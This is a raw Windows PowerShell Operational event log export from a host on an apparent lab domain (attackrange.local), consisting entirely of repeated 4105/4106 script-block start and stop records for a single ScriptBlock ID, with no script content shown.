Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471280
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471279
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471278
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471277
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471276
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471275
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471274
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471273
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471272
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471271
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471270
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471269
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471268
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471267
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471266
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471265
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471264
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471263
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471262
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471261
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471260
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471259
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471258
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471257
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471256
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471255
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471254
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471253
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471252
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471251
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471250
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471249
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471248
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471247
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471246
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471245
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471244
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471243
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471242
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471241
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471240
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471239
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471238
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471237
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471236
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471235
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471234
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471233
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471232
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471231
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471230
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471229
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471228
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471227
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
